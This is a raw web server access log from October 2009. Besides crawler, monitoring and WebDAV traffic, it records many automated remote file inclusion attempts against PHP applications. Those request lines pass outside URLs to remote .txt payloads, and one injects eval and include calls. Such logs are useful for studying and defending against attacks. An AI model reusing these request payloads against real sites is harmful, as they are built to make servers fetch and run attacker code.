201.72.166.52 - - [28/Oct/2009:06:42:55 -0400] "GET /logs/access_log.Q109051200/skin/zero_vote/login.php?dir=http://3sk3nt.kit.net/safe.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.803"
201.72.166.52 - - [28/Oct/2009:06:42:56 -0400] "GET /logs/skin/zero_vote/login.php?dir=http://3sk3nt.kit.net/safe.txt?? HTTP/1.1" 404 227 "-" "libwww-perl/5.803"
209.59.12.99 - - [28/Oct/2009:06:43:08 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
201.72.166.52 - - [28/Oct/2009:06:44:17 -0400] "GET /logs/access_log.Q109081600/skin/zero_vote/login.php?dir=http://3sk3nt.kit.net/safe.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.803"
66.249.65.201 - - [28/Oct/2009:06:44:40 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L41744E4A4FB920001799085+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
193.47.80.39 - - [28/Oct/2009:06:45:23 -0400] "GET /robots.txt HTTP/1.1" 404 208 "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)"
193.47.80.39 - - [28/Oct/2009:06:45:23 -0400] "GET /logs/access_log.Q109062900 HTTP/1.1" 200 5053948 "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)"
193.47.80.39 - - [28/Oct/2009:06:45:25 -0400] "GET /logs/access_log.Q109060300 HTTP/1.1" 200 3991095 "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)"
172.16.1.180 - - [28/Oct/2009:06:45:32 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [28/Oct/2009:06:45:32 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [28/Oct/2009:06:45:32 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
98.129.217.53 - - [28/Oct/2009:06:45:35 -0400] "GET /logs/access_log.Q109101000//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://mobilemagic.sanook.com/cache/id1.txt? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
98.129.217.53 - - [28/Oct/2009:06:45:49 -0400] "GET /logs/access_log.Q109101000//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://mobilemagic.sanook.com/cache/id1.txt? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
94.236.23.242 - - [28/Oct/2009:06:46:32 -0400] "GET /logs/access_log.Q109060600/index1.php?dat=http://koiled.fileave.com/id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
94.236.23.242 - - [28/Oct/2009:06:46:32 -0400] "GET /index1.php?dat=http://koiled.fileave.com/id1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
94.236.23.242 - - [28/Oct/2009:06:46:32 -0400] "GET /logs/index1.php?dat=http://koiled.fileave.com/id1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
94.236.23.242 - - [28/Oct/2009:06:46:34 -0400] "GET /index1.php?dat=http://koiled.fileave.com/id1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
94.236.23.242 - - [28/Oct/2009:06:46:34 -0400] "GET /logs/index1.php?dat=http://koiled.fileave.com/id1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
94.236.23.242 - - [28/Oct/2009:06:46:34 -0400] "GET /logs/access_log.Q109060600/index1.php?dat=http://koiled.fileave.com/id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
174.143.3.188 - - [28/Oct/2009:06:46:37 -0400] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=? HTTP/1.1" 404 245 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
174.143.3.188 - - [28/Oct/2009:06:46:37 -0400] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=? HTTP/1.1" 404 250 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)"
174.143.3.188 - - [28/Oct/2009:06:46:37 -0400] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
174.143.3.188 - - [28/Oct/2009:06:46:37 -0400] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
195.13.191.76 - - [28/Oct/2009:06:46:47 -0400] "GET //index.php?_REQUEST=&_REQUEST%5boption%5d=option,com_comprofiler&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://0pop.com/id2.txt? HTTP/1.1" 404 208 "-" "libwww-perl/5.803"
91.121.106.59 - - [28/Oct/2009:06:47:43 -0400] "GET /logs/error_log.Q109052000 HTTP/1.1" 206 500001 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"
91.121.106.59 - - [28/Oct/2009:06:47:50 -0400] "GET /logs/access_log.Q109052000 HTTP/1.1" 206 500001 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"
209.59.12.99 - - [28/Oct/2009:06:48:07 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
91.121.106.59 - - [28/Oct/2009:06:48:08 -0400] "GET /logs/error_log.Q109052000 HTTP/1.1" 206 500001 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"
91.121.106.59 - - [28/Oct/2009:06:48:12 -0400] "GET /logs/error_log.Q109052000 HTTP/1.1" 206 500001 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"
91.121.106.59 - - [28/Oct/2009:06:48:15 -0400] "GET /logs/access_log.Q109052000 HTTP/1.1" 206 500001 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"
66.249.65.201 - - [28/Oct/2009:06:48:21 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L41744E4A4039400010A9085+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
122.199.140.158 - - [28/Oct/2009:06:48:48 -0400] "GET //?_zb_path=http://www.segurosaldia.com/AK1.txt? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
122.199.140.158 - - [28/Oct/2009:06:48:48 -0400] "GET /logs/access_log.Q109093000//?_zb_path=http://www.segurosaldia.com/AK1.txt? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
122.199.140.158 - - [28/Oct/2009:06:48:48 -0400] "GET /logs//?_zb_path=http://www.segurosaldia.com/AK1.txt? HTTP/1.1" 200 23667 "-" "Mozilla/5.0"
172.16.1.180 - - [28/Oct/2009:06:48:57 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [28/Oct/2009:06:48:57 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [28/Oct/2009:06:48:57 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
94.236.23.242 - - [28/Oct/2009:06:49:20 -0400] "GET /logs/access_log.Q109060600%20%20/index1.php?dat=http://koiled.fileave.com/id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
94.236.23.242 - - [28/Oct/2009:06:49:36 -0400] "GET /logs/access_log.Q109060600%20%20/index1.php?dat=http://koiled.fileave.com/id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
204.124.181.194 - - [28/Oct/2009:06:49:38 -0400] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://scriptsagent.com/copyme.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
204.124.181.194 - - [28/Oct/2009:06:49:38 -0400] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://scriptsagent.com/copyme.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
204.124.181.194 - - [28/Oct/2009:06:49:38 -0400] "GET /logs/access_log.Q109070700/components/com_performs/performs.php?mosConfig_absolute_path=http://scriptsagent.com/copyme.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
204.124.181.194 - - [28/Oct/2009:06:49:38 -0400] "GET /logs/access_log.Q109091400/components/com_performs/performs.php?mosConfig_absolute_path=http://scriptsagent.com/copyme.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
172.16.1.180 - - [28/Oct/2009:06:52:02 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [28/Oct/2009:06:52:02 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [28/Oct/2009:06:52:02 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
66.249.65.201 - - [28/Oct/2009:06:52:02 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L018410405789F500FEA9073+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
204.124.181.194 - - [28/Oct/2009:06:52:20 -0400] "GET /logs/access_log.Q109070700%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://scriptsagent.com/copyme.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
204.124.181.194 - - [28/Oct/2009:06:52:20 -0400] "GET /logs/access_log.Q109091400%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://scriptsagent.com/copyme.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
172.16.1.180 - - [28/Oct/2009:06:53:28 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [28/Oct/2009:06:53:28 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [28/Oct/2009:06:53:28 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [28/Oct/2009:06:55:10 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [28/Oct/2009:06:55:10 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [28/Oct/2009:06:55:10 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
66.249.65.201 - - [28/Oct/2009:06:55:43 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L3174254E4F494000530908V+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
61.96.111.133 - - [28/Oct/2009:06:56:10 -0400] "GET /logs////add.php?dir=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
61.96.111.133 - - [28/Oct/2009:06:56:10 -0400] "GET ////add.php?dir=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
61.96.111.133 - - [28/Oct/2009:06:56:11 -0400] "GET /logs/error_log.Q109092700////add.php?dir=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
61.96.111.133 - - [28/Oct/2009:06:56:12 -0400] "GET /logs/access_log.Q109101900////add.php?dir=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
172.16.1.180 - - [28/Oct/2009:06:56:15 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [28/Oct/2009:06:56:15 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [28/Oct/2009:06:56:15 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
61.96.111.133 - - [28/Oct/2009:06:56:24 -0400] "GET /logs////add.php?dir=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
61.96.111.133 - - [28/Oct/2009:06:56:24 -0400] "GET /logs/error_log.Q109092700////add.php?dir=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
61.96.111.133 - - [28/Oct/2009:06:56:24 -0400] "GET ////add.php?dir=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
61.96.111.133 - - [28/Oct/2009:06:56:25 -0400] "GET /logs/access_log.Q109101900////add.php?dir=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
174.143.3.188 - - [28/Oct/2009:06:56:49 -0400] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=? HTTP/1.1" 404 245 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
174.143.3.188 - - [28/Oct/2009:06:56:49 -0400] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=? HTTP/1.1" 404 250 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)"
174.143.3.188 - - [28/Oct/2009:06:56:49 -0400] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
174.143.3.188 - - [28/Oct/2009:06:56:49 -0400] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 250 "-" "Microsoft Pocket Internet Explorer/0.6"
217.29.159.130 - - [28/Oct/2009:06:57:48 -0400] "GET /logs/access_log.Q109092000/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://lanaalaadi.com/gallery/data/media/2/3/db.txt??? HTTP/1.1" 404 265 "-" "libwww-perl/5.805"
217.29.159.130 - - [28/Oct/2009:06:57:48 -0400] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://lanaalaadi.com/gallery/data/media/2/3/db.txt??? HTTP/1.1" 404 238 "-" "libwww-perl/5.805"
217.29.159.130 - - [28/Oct/2009:06:57:48 -0400] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://lanaalaadi.com/gallery/data/media/2/3/db.txt??? HTTP/1.1" 404 243 "-" "libwww-perl/5.805"
217.29.159.130 - - [28/Oct/2009:06:58:02 -0400] "GET /logs/access_log.Q109080400/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://lanaalaadi.com/gallery/data/media/2/3/db.txt??? HTTP/1.1" 404 265 "-" "libwww-perl/5.805"
211.223.201.177 - - [28/Oct/2009:06:59:20 -0400] "GET ////add.php?dir=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
211.223.201.177 - - [28/Oct/2009:06:59:20 -0400] "GET /logs////add.php?dir=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
211.223.201.177 - - [28/Oct/2009:06:59:20 -0400] "GET /logs/error_log.Q109092700////add.php?dir=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
211.223.201.177 - - [28/Oct/2009:06:59:21 -0400] "GET /logs/access_log.Q109101900////add.php?dir=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
66.249.65.201 - - [28/Oct/2009:06:59:22 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L015E9D4C30495900817804N+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
211.223.201.177 - - [28/Oct/2009:06:59:24 -0400] "GET /logs////add.php?dir=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
211.223.201.177 - - [28/Oct/2009:06:59:24 -0400] "GET /logs/error_log.Q109092700////add.php?dir=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
211.223.201.177 - - [28/Oct/2009:06:59:24 -0400] "GET ////add.php?dir=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
211.223.201.177 - - [28/Oct/2009:06:59:24 -0400] "GET /logs/access_log.Q109101900////add.php?dir=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
211.223.201.177 - - [28/Oct/2009:06:59:32 -0400] "GET /logs/error_log.Q109092700////add.php?dir=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
211.223.201.177 - - [28/Oct/2009:06:59:32 -0400] "GET /logs////add.php?dir=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
211.223.201.177 - - [28/Oct/2009:06:59:32 -0400] "GET /logs/access_log.Q109101900////add.php?dir=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
211.223.201.177 - - [28/Oct/2009:06:59:32 -0400] "GET ////add.php?dir=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
202.88.229.100 - - [28/Oct/2009:06:59:37 -0400] "GET /logs/access_log.Q109091400/components/com_performs/performs.php?mosConfig_absolute_path=http://scriptsagent.com/copyme.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
202.88.229.100 - - [28/Oct/2009:06:59:37 -0400] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://scriptsagent.com/copyme.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
202.88.229.100 - - [28/Oct/2009:06:59:37 -0400] "GET /logs/access_log.Q109070700/components/com_performs/performs.php?mosConfig_absolute_path=http://scriptsagent.com/copyme.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
202.88.229.100 - - [28/Oct/2009:06:59:37 -0400] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://scriptsagent.com/copyme.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
172.16.1.180 - - [28/Oct/2009:07:00:16 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [28/Oct/2009:07:00:16 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [28/Oct/2009:07:00:16 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
85.111.12.199 - - [28/Oct/2009:07:00:36 -0400] "GET /logs/access_log.Q109072400//PhpLinkExchange/bits_listings.php?svr_rootP=http://n34.biz/id1.txt??? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
85.111.12.199 - - [28/Oct/2009:07:00:36 -0400] "GET //PhpLinkExchange/bits_listings.php?svr_rootP=http://n34.biz/id1.txt??? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
85.111.12.199 - - [28/Oct/2009:07:00:36 -0400] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootP=http://n34.biz/id1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
85.111.12.199 - - [28/Oct/2009:07:00:41 -0400] "GET /logs/access_log.Q109080100//PhpLinkExchange/bits_listings.php?svr_rootP=http://n34.biz/id1.txt??? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
172.16.1.180 - - [28/Oct/2009:07:01:38 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [28/Oct/2009:07:01:38 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [28/Oct/2009:07:01:38 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
211.115.89.97 - - [28/Oct/2009:07:02:01 -0400] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
211.115.89.97 - - [28/Oct/2009:07:02:01 -0400] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
211.115.89.97 - - [28/Oct/2009:07:02:02 -0400] "GET /logs/access_log.Q109091400%20%20//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
67.195.110.164 - - [28/Oct/2009:07:02:15 -0400] "GET /logs/error_log.Q109052200 HTTP/1.0" 200 4183464 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
85.111.12.199 - - [28/Oct/2009:07:02:21 -0400] "GET /logs/access_log.Q109072400//PhpLinkExchange/bits_listings.php?svr_rootP=http://n34.biz/id1.txt??? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
85.111.12.199 - - [28/Oct/2009:07:02:21 -0400] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootP=http://n34.biz/id1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
85.111.12.199 - - [28/Oct/2009:07:02:21 -0400] "GET //PhpLinkExchange/bits_listings.php?svr_rootP=http://n34.biz/id1.txt??? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
85.111.12.199 - - [28/Oct/2009:07:02:25 -0400] "GET /logs/access_log.Q109080100//PhpLinkExchange/bits_listings.php?svr_rootP=http://n34.biz/id1.txt??? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
172.16.1.180 - - [28/Oct/2009:07:02:38 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [28/Oct/2009:07:02:38 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [28/Oct/2009:07:02:38 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
67.195.110.164 - - [28/Oct/2009:07:02:16 -0400] "GET /logs/error_log.Q109052200 HTTP/1.0" 200 4183464 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
66.249.65.200 - - [28/Oct/2009:07:03:03 -0400] "GET /robots.txt HTTP/1.1" 404 208 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.65.200 - - [28/Oct/2009:07:03:03 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L015E9D4C3109C900897804N+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
211.115.89.97 - - [28/Oct/2009:07:03:52 -0400] "GET /logs/error_log.Q109082100%20%20//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
217.29.159.130 - - [28/Oct/2009:07:04:08 -0400] "GET /logs/access_log.Q109052400///vwar/backup/errors.php?error=http://lanaalaadi.com/gallery/data/media/2/3/db.txt??? HTTP/1.1" 404 249 "-" "libwww-perl/5.805"
217.29.159.130 - - [28/Oct/2009:07:04:08 -0400] "GET /logs///vwar/backup/errors.php?error=http://lanaalaadi.com/gallery/data/media/2/3/db.txt??? HTTP/1.1" 404 227 "-" "libwww-perl/5.805"
217.29.159.130 - - [28/Oct/2009:07:04:09 -0400] "GET ///vwar/backup/errors.php?error=http://lanaalaadi.com/gallery/data/media/2/3/db.txt??? HTTP/1.1" 404 222 "-" "libwww-perl/5.805"
211.115.89.97 - - [28/Oct/2009:07:04:15 -0400] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
211.115.89.97 - - [28/Oct/2009:07:04:15 -0400] "GET /logs/access_log.Q109091400%20%20//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
211.115.89.97 - - [28/Oct/2009:07:04:15 -0400] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
211.115.89.97 - - [28/Oct/2009:07:04:27 -0400] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
211.115.89.97 - - [28/Oct/2009:07:04:27 -0400] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
211.115.89.97 - - [28/Oct/2009:07:04:27 -0400] "GET /logs/access_log.Q109091400%20%20//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
217.29.159.130 - - [28/Oct/2009:07:04:48 -0400] "GET /logs/access_log.Q109093000///vwar/backup/errors.php?error=http://lanaalaadi.com/gallery/data/media/2/3/db.txt??? HTTP/1.1" 404 249 "-" "libwww-perl/5.805"
211.223.201.177 - - [28/Oct/2009:07:05:36 -0400] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
211.223.201.177 - - [28/Oct/2009:07:05:36 -0400] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
211.223.201.177 - - [28/Oct/2009:07:05:36 -0400] "GET /logs/access_log.Q109091400%20%20//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
